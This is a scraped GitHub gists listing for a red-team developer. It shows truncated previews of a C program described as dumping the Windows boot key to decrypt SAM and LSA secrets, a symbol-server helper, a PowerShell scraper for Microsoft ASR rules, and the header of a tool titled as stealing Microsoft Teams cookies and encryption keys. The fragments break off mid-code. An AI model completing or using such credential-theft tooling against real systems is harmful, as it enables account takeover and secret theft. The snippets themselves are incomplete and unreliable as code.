clod clod81
  • Tier Zero Security
@Dfte
Dfte / DumpBootKey.c
Created July 4, 2024 13:49
C code to dump and compute the boot key used to decrypt SAM and LSA secrets.
#include <windows.h>
#include <stdio.h>
#define BOOT_KEY_SIZE 16
#pragma warning(disable: 4996)
void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) {
    HKEY hKey;
    LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey);
    if (result != ERROR_SUCCESS) {
        fprintf(stderr, "Error opening registry key: %ld\n", result);
#include <windows.h>
#include <iostream>
#include <sstream>
std::string
GetSymbolServerURL(
const std::string& moduleName
)
{
/* Extract timestamp and image size from a module
# 1. Fetch and extract the ASR rule table block
$asrUrl = "https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#asr-rule-to-guid-matrix"
$page = Invoke-WebRequest -Uri $asrUrl -UseBasicParsing
# Extract the table HTML after the ASR heading
$tableBlock = [regex]::Match($page.Content, '(?is)<h2 id="asr-rule-to-guid-matrix">.*?<table.*?>(.*?)</table>').Groups[1].Value
# 2. Parse each table row (skip header, only rows with two <td>s)
$asrRuleMap = @{}
foreach ($row in [regex]::Matches($tableBlock, '<tr>\s*<td.*?</td>\s*<td.*?</td>\s*</tr>', 'IgnoreCase')) {
@clod81
clod81 / teams-cookies-bof.c
Created November 1, 2025 21:06
Steal MS Teams Cookies and Encryption key - BOF
// Based on research: https://blog.randorisec.fr/ms-teams-access-tokens/
// Heavily based on cookie-monster BOF: https://github.com/KingOfTheNOPs/cookie-monster
// Code based on mr.un1k0d3r's seasonal videos and his cookie-grabber POC
// https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF/blob/main/cookie-graber.c
// fileless download based on nanodump methods
// https://github.com/fortra/nanodump
#include <windows.h>
#include <stdint.h>
#include <stdio.h>